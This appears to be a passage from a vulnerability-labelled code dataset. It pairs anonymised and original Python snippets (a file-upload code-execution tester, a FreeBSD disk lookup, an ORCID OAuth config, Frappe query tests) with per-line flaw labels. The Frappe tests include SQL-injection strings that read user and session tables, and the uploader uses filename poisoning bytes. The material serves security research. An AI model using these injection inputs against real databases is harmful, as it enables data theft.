"if VAR_48:\n",
"VAR_48 = self.detectCodeExec(VAR_41, VAR_20)\n",
"if b in VAR_35:\n",
"VAR_23['codeExec'] = True\n",
"if VAR_48:\n",
"VAR_41 = b.join(VAR_18.split(b)[:-1])\n",
"VAR_23['codeExec'] = True\n"
] | [
"def submitTestCase(self, suffix, mime, payload=None, codeExecRegex=None):...\n",
"fu = self.uploadFile(suffix, mime, payload)\n",
"uploadRes = self.isASuccessfulUpload(fu[0].text)\n",
"result = {'uploaded': False, 'codeExec': False}\n",
"if uploadRes:\n",
"result['uploaded'] = True\n",
"return result\n",
"if self.shouldLog:\n",
"self.logger.info(\"\\x1b[1;32mUpload of '%s' with mime type %s successful\\x1b[m\",\n fu[1], mime)\n",
"if uploadRes != True:\n",
"if self.shouldLog:\n",
"if codeExecRegex and valid_regex(codeExecRegex) and (self.uploadsFolder or\n",
"self.logger.info(\n '\\x1b[1;32m\\tTrue regex matched the following information : %s\\x1b[m',\n uploadRes)\n",
"url = None\n",
"secondUrl = None\n",
"if self.uploadsFolder:\n",
"url = self.schema + '://' + self.host + '/' + self.uploadsFolder + '/' + fu[1]\n",
"if self.codeExecUrlPattern:\n",
"filename = fu[1]\n",
"url = self.codeExecUrlPattern.replace('$captGroup$', uploadRes)\n",
"if url:\n",
"secondUrl = None\n",
"executedCode = self.detectCodeExec(url, codeExecRegex)\n",
"if secondUrl:\n",
"for b in getPoisoningBytes():\n",
"if executedCode:\n",
"executedCode = self.detectCodeExec(secondUrl, codeExecRegex)\n",
"if b in filename:\n",
"result['codeExec'] = True\n",
"if executedCode:\n",
"secondUrl = b.join(url.split(b)[:-1])\n",
"result['codeExec'] = True\n"
] | [
0,
7,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
7,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Return'",
"Condition",
"Expr'",
"Condition",
"Condition",
"Condition",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"For",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Assign'"
] |
[
"def FUNC_11(self):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_46 = self.xsrf_token\n",
"if not VAR_46:\n",
"return CLASS_0.validate(VAR_46, [api.get_current_identity().to_bytes()])\n"
] | [
"def verify_xsrf_token(self):...\n",
"\"\"\"docstring\"\"\"\n",
"token = self.xsrf_token\n",
"if not token:\n",
"return XSRFToken.validate(token, [api.get_current_identity().to_bytes()])\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Condition",
"Return'"
] |
[
"def FUNC_23(self, VAR_13):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_13 > 3:\n",
"return None\n",
"VAR_30 = '00000000'\n",
"if VAR_13 > 1:\n",
"VAR_30 = '00000001'\n",
"VAR_23, VAR_22 = shellutil.run_get_output(\n 'sysctl dev.storvsc | grep pnpinfo | grep deviceid=')\n",
"VAR_13 = VAR_13 - 2\n",
"if VAR_23:\n",
"return None\n",
"VAR_31 = '000' + ustr(VAR_13)\n",
"VAR_32 = '{0}-{1}'.format(VAR_30, VAR_31)\n",
"\"\"\"string\"\"\"\n",
"VAR_33 = 'sysctl dev.storvsc | grep pnpinfo | grep deviceid={0}'.format(VAR_32)\n",
"VAR_23, VAR_22 = shellutil.run_get_output(VAR_33)\n",
"if VAR_23:\n",
"return None\n",
"VAR_34 = VAR_33 + \"|awk -F . '{print $3}'\"\n",
"VAR_23, VAR_22 = shellutil.run_get_output(VAR_34)\n",
"\"\"\"\n try to search 'blkvscX' and 'storvscX' to find device name\n \"\"\"\n",
"VAR_22 = VAR_22.rstrip()\n",
"VAR_35 = \"camcontrol devlist -b | grep blkvsc{0} | awk '{{print $1}}'\".format(\n VAR_22)\n",
"VAR_23, VAR_22 = shellutil.run_get_output(VAR_35)\n",
"if VAR_23 == 0:\n",
"VAR_22 = VAR_22.rstrip()\n",
"VAR_36 = \"camcontrol devlist -b | grep storvsc{0} | awk '{{print $1}}'\".format(\n VAR_22)\n",
"VAR_37 = (\n \"camcontrol devlist | grep {0} | awk -F \\\\( '{{print $2}}'|sed -e 's/.*(//'| sed -e 's/).*//'\"\n .format(VAR_22))\n",
"VAR_23, VAR_22 = shellutil.run_get_output(VAR_36)\n",
"VAR_23, VAR_22 = shellutil.run_get_output(VAR_37)\n",
"if VAR_23 == 0:\n",
"if VAR_23 == 0:\n",
"VAR_22 = VAR_22.rstrip()\n",
"return None\n",
"for possible in VAR_22.rstrip().split(','):\n",
"VAR_37 = (\n \"camcontrol devlist | grep {0} | awk -F \\\\( '{{print $2}}'|sed -e 's/.*(//'| sed -e 's/).*//'\"\n .format(VAR_22))\n",
"if not possible.startswith('pass'):\n",
"VAR_23, VAR_22 = shellutil.run_get_output(VAR_37)\n",
"return possible\n",
"if VAR_23 == 0:\n",
"for possible in VAR_22.rstrip().split(','):\n",
"if not possible.startswith('pass'):\n",
"return possible\n"
] | [
"def device_for_ide_port(self, port_id):...\n",
"\"\"\"docstring\"\"\"\n",
"if port_id > 3:\n",
"return None\n",
"g0 = '00000000'\n",
"if port_id > 1:\n",
"g0 = '00000001'\n",
"err, output = shellutil.run_get_output(\n 'sysctl dev.storvsc | grep pnpinfo | grep deviceid=')\n",
"port_id = port_id - 2\n",
"if err:\n",
"return None\n",
"g1 = '000' + ustr(port_id)\n",
"g0g1 = '{0}-{1}'.format(g0, g1)\n",
"\"\"\"\n search 'X' from 'dev.storvsc.X.%pnpinfo: classid=32412632-86cb-44a2-9b5c-50d1417354f5 deviceid=00000000-0001-8899-0000-000000000000'\n \"\"\"\n",
"cmd_search_ide = ('sysctl dev.storvsc | grep pnpinfo | grep deviceid={0}'.\n format(g0g1))\n",
"err, output = shellutil.run_get_output(cmd_search_ide)\n",
"if err:\n",
"return None\n",
"cmd_extract_id = cmd_search_ide + \"|awk -F . '{print $3}'\"\n",
"err, output = shellutil.run_get_output(cmd_extract_id)\n",
"\"\"\"\n try to search 'blkvscX' and 'storvscX' to find device name\n \"\"\"\n",
"output = output.rstrip()\n",
"cmd_search_blkvsc = (\n \"camcontrol devlist -b | grep blkvsc{0} | awk '{{print $1}}'\".format(\n output))\n",
"err, output = shellutil.run_get_output(cmd_search_blkvsc)\n",
"if err == 0:\n",
"output = output.rstrip()\n",
"cmd_search_storvsc = (\n \"camcontrol devlist -b | grep storvsc{0} | awk '{{print $1}}'\".format(\n output))\n",
"cmd_search_dev = (\n \"camcontrol devlist | grep {0} | awk -F \\\\( '{{print $2}}'|sed -e 's/.*(//'| sed -e 's/).*//'\"\n .format(output))\n",
"err, output = shellutil.run_get_output(cmd_search_storvsc)\n",
"err, output = shellutil.run_get_output(cmd_search_dev)\n",
"if err == 0:\n",
"if err == 0:\n",
"output = output.rstrip()\n",
"return None\n",
"for possible in output.rstrip().split(','):\n",
"cmd_search_dev = (\n \"camcontrol devlist | grep {0} | awk -F \\\\( '{{print $2}}'|sed -e 's/.*(//'| sed -e 's/).*//'\"\n .format(output))\n",
"if not possible.startswith('pass'):\n",
"err, output = shellutil.run_get_output(cmd_search_dev)\n",
"return possible\n",
"if err == 0:\n",
"for possible in output.rstrip().split(','):\n",
"if not possible.startswith('pass'):\n",
"return possible\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Return'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Return'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Condition",
"Assign'",
"Return'",
"For",
"Assign'",
"Condition",
"Assign'",
"Return'",
"Condition",
"For",
"Condition",
"Return'"
] |
[
"\"\"\"string\"\"\"\n",
"import copy\n",
"from flask import current_app, session\n",
"from flask.ext.login import current_user\n",
"from invenio.ext.sqlalchemy.utils import session_manager\n",
"VAR_0 = dict(title='ORCID', description=\n 'Connecting Research and Researchers.', icon='', authorized_handler=\n 'invenio.modules.oauthclient.handlers:authorized_signup_handler',\n disconnect_handler=\n 'invenio.modules.oauthclient.handlers:disconnect_handler',\n signup_handler=dict(info=\n 'invenio.modules.oauthclient.contrib.orcid:account_info', setup=\n 'invenio.modules.oauthclient.contrib.orcid:account_setup', view=\n 'invenio.modules.oauthclient.handlers:signup_handler'), params=dict(\n request_token_params={'scope': '/authenticate'}, base_url=\n 'https://pub.orcid.com/', request_token_url=None, access_token_url=\n 'https://pub.orcid.org/oauth/token', access_token_method='POST',\n authorize_url='https://orcid.org/oauth/authorize#show_login', app_key=\n 'ORCID_APP_CREDENTIALS', content_type='application/json'))\n",
"\"\"\" ORCID Remote Application. \"\"\"\n",
"VAR_1 = copy.deepcopy(VAR_0)\n",
"\"\"\"ORCID Sandbox Remote Application.\"\"\"\n",
"VAR_1['params'].update(dict(base_url='https://api.sandbox.orcid.org/',\n access_token_url='https://api.sandbox.orcid.org/oauth/token',\n authorize_url='https://sandbox.orcid.org/oauth/authorize#show_login'))\n",
"def FUNC_0(VAR_2, VAR_3):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_5 = dict(external_id=resp.get('orcid'), external_method='orcid')\n",
"return VAR_5\n"
] | [
"\"\"\"Pre-configured remote application for enabling sign in/up with ORCID.\n\n**Usage:**\n\n1. Edit your configuration and add:\n\n .. code-block:: python\n\n from invenio.modules.oauthclient.contrib import orcid\n OAUTHCLIENT_REMOTE_APPS = dict(\n orcid=orcid.REMOTE_APP,\n )\n\n ORCID_APP_CREDENTIALS = dict(\n consumer_key=\"changeme\",\n consumer_secret=\"changeme\",\n )\n\n Note, if you want to use the ORCID sandbox, use ``orcid.REMOTE_SANDBOX_APP``\n instead of ``orcid.REMOTE_APP``.\n\n2. Register a new application with ORCID. When registering the\n application ensure that the *Redirect URI* points to:\n ``CFG_SITE_SECURE_URL/oauth/authorized/orcid/`` (note, ORCID does not\n allow localhost to be used, thus testing on development machines is\n somewhat complicated by this).\n\n\n3. Grab the *Client ID* and *Client Secret* after registering the application\n and add them to your instance configuration (``invenio.cfg``):\n\n .. code-block:: python\n\n ORCID_APP_CREDENTIALS = dict(\n consumer_key=\"<CLIENT ID>\",\n consumer_secret=\"<CLIENT SECRET>\",\n )\n\n4. Now go to ``CFG_SITE_SECURE_URL/oauth/login/orcid/`` (e.g.\n http://localhost:4000/oauth/login/orcid/)\n\n5. Also, you should see ORCID listed under Linked accounts:\n http://localhost:4000//account/settings/linkedaccounts/\n\nBy default the ORCID module will try first look if a link already exists\nbetween a ORCID account and a user. If no link is found, the user is asked\nto provide an email address to sign-up.\n\nIn templates you can add a sign in/up link:\n\n.. code-block:: jinja\n\n <a href=\"{{url_for('oauthclient.login', remote_app='orcid')}}\">Sign in with ORCID</a>\n\n\"\"\"\n",
"import copy\n",
"from flask import current_app, session\n",
"from flask.ext.login import current_user\n",
"from invenio.ext.sqlalchemy.utils import session_manager\n",
"REMOTE_APP = dict(title='ORCID', description=\n 'Connecting Research and Researchers.', icon='', authorized_handler=\n 'invenio.modules.oauthclient.handlers:authorized_signup_handler',\n disconnect_handler=\n 'invenio.modules.oauthclient.handlers:disconnect_handler',\n signup_handler=dict(info=\n 'invenio.modules.oauthclient.contrib.orcid:account_info', setup=\n 'invenio.modules.oauthclient.contrib.orcid:account_setup', view=\n 'invenio.modules.oauthclient.handlers:signup_handler'), params=dict(\n request_token_params={'scope': '/authenticate'}, base_url=\n 'https://pub.orcid.com/', request_token_url=None, access_token_url=\n 'https://pub.orcid.org/oauth/token', access_token_method='POST',\n authorize_url='https://orcid.org/oauth/authorize#show_login', app_key=\n 'ORCID_APP_CREDENTIALS', content_type='application/json'))\n",
"\"\"\" ORCID Remote Application. \"\"\"\n",
"REMOTE_SANDBOX_APP = copy.deepcopy(REMOTE_APP)\n",
"\"\"\"ORCID Sandbox Remote Application.\"\"\"\n",
"REMOTE_SANDBOX_APP['params'].update(dict(base_url=\n 'https://api.sandbox.orcid.org/', access_token_url=\n 'https://api.sandbox.orcid.org/oauth/token', authorize_url=\n 'https://sandbox.orcid.org/oauth/authorize#show_login'))\n",
"def account_info(remote, resp):...\n",
"\"\"\"docstring\"\"\"\n",
"account_info = dict(external_id=resp.get('orcid'), external_method='orcid')\n",
"return account_info\n"
] | [
0,
0,
0,
0,
0,
5,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"FunctionDef'",
"Docstring",
"Assign'",
"Return'"
] |
[
"def FUNC_13(self):...\n",
"\"\"\"docstring\"\"\"\n",
"return self.task.__acl__()\n"
] | [
"def get_discount_line_acl(self):...\n",
"\"\"\"docstring\"\"\"\n",
"return self.task.__acl__()\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def __init__(self, VAR_0, VAR_1):...\n",
"self.user = VAR_0\n",
"self.file = VAR_1\n",
"self.raw_data = None\n"
] | [
"def __init__(self, user, file):...\n",
"self.user = user\n",
"self.file = file\n",
"self.raw_data = None\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'"
] |
[
"def FUNC_1(self):...\n",
"self.start_time = time.time()\n",
"VAR_13 = []\n",
"VAR_14 = 3\n",
"VAR_15 = len(self.scenes)\n",
"for i in range(VAR_14):\n",
"VAR_18 = int(VAR_15 / VAR_14 * i)\n",
"for VAR_20 in VAR_13:\n",
"VAR_19 = int(VAR_15 / VAR_14 * (i + 1))\n",
"VAR_3.info('abouto call join for the analysis thread {}'.format(VAR_20.name))\n",
"VAR_3.info('we have joined all threads. Should tweet after this')\n",
"VAR_9 = self.scenes[VAR_18:VAR_19]\n",
"VAR_20.join()\n",
"if not VAR_0 and VAR_2:\n",
"VAR_8 = [VAR_10.get_name() for VAR_10 in VAR_9]\n",
"VAR_21 = time.time() - self.start_time\n",
"VAR_0 = True\n",
"VAR_20 = Thread(target=self.analyze_scenes, VAR_8=str(name), args=(chunk,))\n",
"VAR_22 = VAR_21 / 60\n",
"VAR_21 = time.time() - self.start_time\n",
"VAR_3.info('Trying to start the analysis thread for scenes {}'.format(\n VAR_20.name))\n",
"VAR_3.info('joining for the analysis thread {} in {} minutes'.format(VAR_20\n .name, VAR_22))\n",
"VAR_22 = VAR_21 / 60\n",
"VAR_20.start()\n",
"if not VAR_0 and VAR_2:\n",
"VAR_3.info(\n 'Just finished analyzing scenes for the first time. It took {} minutes. About to tweet'\n .format(VAR_22))\n",
"VAR_13.append(VAR_20)\n",
"tweet('joining for the analysis thread {} in {} minutes'.format(VAR_20.\n name, VAR_22))\n",
"tweet('Done loading scene data. Took {} minutes'.format(VAR_22))\n"
] | [
"def create_analysis_threads(self):...\n",
"self.start_time = time.time()\n",
"threads = []\n",
"num_threads = 3\n",
"length = len(self.scenes)\n",
"for i in range(num_threads):\n",
"i1 = int(length / num_threads * i)\n",
"for t in threads:\n",
"i2 = int(length / num_threads * (i + 1))\n",
"LOG.info('abouto call join for the analysis thread {}'.format(t.name))\n",
"LOG.info('we have joined all threads. Should tweet after this')\n",
"chunk = self.scenes[i1:i2]\n",
"t.join()\n",
"if not analyzed_scenes and should_tweet:\n",
"name = [scene.get_name() for scene in chunk]\n",
"seconds_to_analyze = time.time() - self.start_time\n",
"analyzed_scenes = True\n",
"t = Thread(target=self.analyze_scenes, name=str(name), args=(chunk,))\n",
"minutes = seconds_to_analyze / 60\n",
"seconds_to_analyze = time.time() - self.start_time\n",
"LOG.info('Trying to start the analysis thread for scenes {}'.format(t.name))\n",
"LOG.info('joining for the analysis thread {} in {} minutes'.format(t.name,\n minutes))\n",
"minutes = seconds_to_analyze / 60\n",
"t.start()\n",
"if not analyzed_scenes and should_tweet:\n",
"LOG.info(\n 'Just finished analyzing scenes for the first time. It took {} minutes. About to tweet'\n .format(minutes))\n",
"threads.append(t)\n",
"tweet('joining for the analysis thread {} in {} minutes'.format(t.name,\n minutes))\n",
"tweet('Done loading scene data. Took {} minutes'.format(minutes))\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"For",
"Assign'",
"For",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Expr'"
] |
[
"def FUNC_12(self):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_22 = self.env['crapo.automaton']\n",
"VAR_23 = self.env['ir.model'].search([('model', '=', self._state_for_model)\n ], limit=1)\n",
"VAR_24 = VAR_22.search([('model_id', '=', VAR_23.id)])\n",
"if not VAR_24:\n",
"VAR_24 = VAR_22.create({'name': 'Automaton for {}'.format(self.\n _state_for_model), 'model_id': VAR_23.id})\n",
"return VAR_24\n"
] | [
"def _do_search_default_automaton(self):...\n",
"\"\"\"docstring\"\"\"\n",
"automaton_model = self.env['crapo.automaton']\n",
"my_model = self.env['ir.model'].search([('model', '=', self.\n _state_for_model)], limit=1)\n",
"my_automaton = automaton_model.search([('model_id', '=', my_model.id)])\n",
"if not my_automaton:\n",
"my_automaton = automaton_model.create({'name': 'Automaton for {}'.format(\n self._state_for_model), 'model_id': my_model.id})\n",
"return my_automaton\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Return'"
] |
[
"\"\"\"string\"\"\"\n",
"import argparse\n",
"import importlib\n",
"import os\n",
"import sys\n",
"from parlai.core.agents import get_agent_module, get_task_module\n",
"from parlai.tasks.tasks import ids_to_tasks\n",
"def FUNC_0(VAR_0):...\n",
"VAR_3 = VAR_0.lower()\n",
"if VAR_3 in ('yes', 'true', 't', '1', 'y'):\n",
"return True\n",
"if VAR_3 in ('no', 'false', 'f', 'n', '0'):\n",
"return False\n",
"def FUNC_1(VAR_0):...\n",
"\"\"\"docstring\"\"\"\n",
"if ':' not in VAR_0:\n",
"VAR_4 = VAR_0.split(':')\n",
"VAR_5 = importlib.import_module(VAR_4[0])\n",
"return getattr(VAR_5, VAR_4[1])\n"
] | [
"\"\"\"Provides an argument parser and a set of default command line options for\nusing the ParlAI package.\n\"\"\"\n",
"import argparse\n",
"import importlib\n",
"import os\n",
"import sys\n",
"from parlai.core.agents import get_agent_module, get_task_module\n",
"from parlai.tasks.tasks import ids_to_tasks\n",
"def str2bool(value):...\n",
"v = value.lower()\n",
"if v in ('yes', 'true', 't', '1', 'y'):\n",
"return True\n",
"if v in ('no', 'false', 'f', 'n', '0'):\n",
"return False\n",
"def str2class(value):...\n",
"\"\"\"docstring\"\"\"\n",
"if ':' not in value:\n",
"name = value.split(':')\n",
"module = importlib.import_module(name[0])\n",
"return getattr(module, name[1])\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"FunctionDef'",
"Assign'",
"Condition",
"Return'",
"Condition",
"Return'",
"FunctionDef'",
"Docstring",
"Condition",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_2(self, VAR_1, VAR_2, *VAR_3, **VAR_4):...\n",
"self.handled_resp = VAR_1\n",
"self.handled_remote = VAR_2\n",
"self.handled_args = VAR_3\n",
"self.handled_kwargs = VAR_4\n",
"return 'TEST'\n"
] | [
"def handler(self, resp, remote, *args, **kwargs):...\n",
"self.handled_resp = resp\n",
"self.handled_remote = remote\n",
"self.handled_args = args\n",
"self.handled_kwargs = kwargs\n",
"return 'TEST'\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Return'"
] |
[
"from __future__ import unicode_literals\n",
"import frappe, unittest\n",
"from frappe.model.db_query import DatabaseQuery\n",
"from frappe.desk.reportview import get_filters_cond\n",
"def FUNC_1(self):...\n",
"self.assertTrue({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n limit_page_length=None))\n",
"def FUNC_2(self):...\n",
"self.assertTrue({'name': 'DocType', 'issingle': 0} in DatabaseQuery(\n 'DocType').execute(fields=['name', 'issingle'], limit_page_length=None))\n",
"def FUNC_3(self):...\n",
"self.assertFalse({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters=[['DocType', 'name', 'like', 'J%']]))\n",
"def FUNC_4(self):...\n",
"self.assertFalse({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters=[{'name': ['like', 'J%']}]))\n",
"def FUNC_5(self):...\n",
"self.assertFalse({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters={'name': ['like', 'J%']}))\n",
"def FUNC_6(self):...\n",
"self.assertTrue({'name': 'DocField'} in DatabaseQuery('DocType').execute(\n filters={'name': 'DocField'}))\n",
"def FUNC_7(self):...\n",
"self.assertFalse(DatabaseQuery('DocType').execute(filters={'name': ['in',\n None]}))\n",
"self.assertTrue({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters={'name': ['not in', None]}))\n",
"for result in [{'name': 'DocType'}, {'name': 'DocField'}]:\n",
"self.assertTrue(result in DatabaseQuery('DocType').execute(filters={'name':\n ['in', 'DocType,DocField']}))\n",
"for result in [{'name': 'DocType'}, {'name': 'DocField'}]:\n",
"self.assertFalse(result in DatabaseQuery('DocType').execute(filters={'name':\n ['not in', 'DocType,DocField']}))\n",
"def FUNC_8(self):...\n",
"VAR_3 = DatabaseQuery('DocField').execute(filters={'parent': 'DocType'},\n fields=['fieldname', 'fieldtype'], or_filters=[{'fieldtype': 'Table'},\n {'fieldtype': 'Select'}])\n",
"self.assertTrue({'fieldtype': 'Table', 'fieldname': 'fields'} in VAR_3)\n",
"self.assertTrue({'fieldtype': 'Select', 'fieldname': 'document_type'} in VAR_3)\n",
"self.assertFalse({'fieldtype': 'Check', 'fieldname': 'issingle'} in VAR_3)\n",
"def FUNC_9(self):...\n",
"\"\"\"docstring\"\"\"\n",
"frappe.db.sql('delete from tabEvent')\n",
"VAR_4 = FUNC_0()\n",
"VAR_5 = FUNC_0(VAR_1='2016-07-05 23:59:59')\n",
"VAR_6 = FUNC_0(VAR_1='2016-07-06 00:00:00')\n",
"VAR_7 = FUNC_0(VAR_1='2016-07-07 23:59:59')\n",
"VAR_8 = FUNC_0(VAR_1='2016-07-08 00:00:01')\n",
"VAR_3 = DatabaseQuery('Event').execute(filters={'starts_on': ['between',\n None]}, fields=['name'])\n",
"self.assertTrue({'name': VAR_5.name} not in VAR_3)\n",
"VAR_3 = DatabaseQuery('Event').execute(filters={'starts_on': ['between', [\n '2016-07-06', '2016-07-07']]}, fields=['name'])\n",
"self.assertTrue({'name': VAR_6.name} in VAR_3)\n",
"self.assertTrue({'name': VAR_7.name} in VAR_3)\n",
"self.assertTrue({'name': VAR_5.name} not in VAR_3)\n",
"self.assertTrue({'name': VAR_8.name} not in VAR_3)\n",
"VAR_3 = DatabaseQuery('Event').execute(filters={'starts_on': ['between', [\n '2016-07-07']]}, fields=['name'])\n",
"self.assertTrue({'name': VAR_7.name} in VAR_3)\n",
"self.assertTrue({'name': VAR_8.name} in VAR_3)\n",
"self.assertTrue({'name': VAR_4.name} in VAR_3)\n",
"self.assertTrue({'name': VAR_5.name} not in VAR_3)\n",
"self.assertTrue({'name': VAR_6.name} not in VAR_3)\n",
"def FUNC_10(self):...\n",
"frappe.set_user('[email protected]')\n",
"self.assertRaises(frappe.PermissionError, get_filters_cond, 'DocType', dict\n (istable=1), [])\n",
"self.assertTrue(get_filters_cond('DocType', dict(istable=1), [],\n ignore_permissions=True))\n",
"frappe.set_user('Administrator')\n",
"def FUNC_11(self):...\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name', 'issingle, version()'], limit_start=0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name',\n 'issingle, IF(issingle=1, (select name from tabUser), count(name))'],\n limit_start=0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name', 'issingle, (select count(*) from tabSessions)'],\n limit_start=0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name',\n \"issingle, SELECT LOCATE('', `tabUser`.`user`) AS user;\"], limit_start=\n 0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name',\n 'issingle, IF(issingle=1, (SELECT name from tabUser), count(*))'],\n limit_start=0, limit_page_length=1)\n",
"VAR_3 = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n 'count(name)'], limit_start=0, limit_page_length=1)\n",
"self.assertTrue('count(name)' in VAR_3[0])\n",
"VAR_3 = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n \"locate('', name) as _relevance\"], limit_start=0, limit_page_length=1)\n",
"self.assertTrue('_relevance' in VAR_3[0])\n",
"VAR_3 = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n 'date(creation) as creation'], limit_start=0, limit_page_length=1)\n",
"self.assertTrue('creation' in VAR_3[0])\n",
"VAR_3 = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n 'datediff(modified, creation) as date_diff'], limit_start=0,\n limit_page_length=1)\n",
"self.assertTrue('date_diff' in VAR_3[0])\n",
"def FUNC_0(VAR_0='_Test Event', VAR_1=None):...\n",
"\"\"\"docstring\"\"\"\n",
"from frappe.utils import get_datetime\n",
"VAR_2 = frappe.get_doc({'doctype': 'Event', 'subject': VAR_0, 'event_type':\n 'Public', 'starts_on': get_datetime(VAR_1)}).insert(ignore_permissions=True\n )\n",
"return VAR_2\n"
] | [
"from __future__ import unicode_literals\n",
"import frappe, unittest\n",
"from frappe.model.db_query import DatabaseQuery\n",
"from frappe.desk.reportview import get_filters_cond\n",
"def test_basic(self):...\n",
"self.assertTrue({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n limit_page_length=None))\n",
"def test_fields(self):...\n",
"self.assertTrue({'name': 'DocType', 'issingle': 0} in DatabaseQuery(\n 'DocType').execute(fields=['name', 'issingle'], limit_page_length=None))\n",
"def test_filters_1(self):...\n",
"self.assertFalse({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters=[['DocType', 'name', 'like', 'J%']]))\n",
"def test_filters_2(self):...\n",
"self.assertFalse({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters=[{'name': ['like', 'J%']}]))\n",
"def test_filters_3(self):...\n",
"self.assertFalse({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters={'name': ['like', 'J%']}))\n",
"def test_filters_4(self):...\n",
"self.assertTrue({'name': 'DocField'} in DatabaseQuery('DocType').execute(\n filters={'name': 'DocField'}))\n",
"def test_in_not_in_filters(self):...\n",
"self.assertFalse(DatabaseQuery('DocType').execute(filters={'name': ['in',\n None]}))\n",
"self.assertTrue({'name': 'DocType'} in DatabaseQuery('DocType').execute(\n filters={'name': ['not in', None]}))\n",
"for result in [{'name': 'DocType'}, {'name': 'DocField'}]:\n",
"self.assertTrue(result in DatabaseQuery('DocType').execute(filters={'name':\n ['in', 'DocType,DocField']}))\n",
"for result in [{'name': 'DocType'}, {'name': 'DocField'}]:\n",
"self.assertFalse(result in DatabaseQuery('DocType').execute(filters={'name':\n ['not in', 'DocType,DocField']}))\n",
"def test_or_filters(self):...\n",
"data = DatabaseQuery('DocField').execute(filters={'parent': 'DocType'},\n fields=['fieldname', 'fieldtype'], or_filters=[{'fieldtype': 'Table'},\n {'fieldtype': 'Select'}])\n",
"self.assertTrue({'fieldtype': 'Table', 'fieldname': 'fields'} in data)\n",
"self.assertTrue({'fieldtype': 'Select', 'fieldname': 'document_type'} in data)\n",
"self.assertFalse({'fieldtype': 'Check', 'fieldname': 'issingle'} in data)\n",
"def test_between_filters(self):...\n",
"\"\"\"docstring\"\"\"\n",
"frappe.db.sql('delete from tabEvent')\n",
"todays_event = create_event()\n",
"event1 = create_event(starts_on='2016-07-05 23:59:59')\n",
"event2 = create_event(starts_on='2016-07-06 00:00:00')\n",
"event3 = create_event(starts_on='2016-07-07 23:59:59')\n",
"event4 = create_event(starts_on='2016-07-08 00:00:01')\n",
"data = DatabaseQuery('Event').execute(filters={'starts_on': ['between',\n None]}, fields=['name'])\n",
"self.assertTrue({'name': event1.name} not in data)\n",
"data = DatabaseQuery('Event').execute(filters={'starts_on': ['between', [\n '2016-07-06', '2016-07-07']]}, fields=['name'])\n",
"self.assertTrue({'name': event2.name} in data)\n",
"self.assertTrue({'name': event3.name} in data)\n",
"self.assertTrue({'name': event1.name} not in data)\n",
"self.assertTrue({'name': event4.name} not in data)\n",
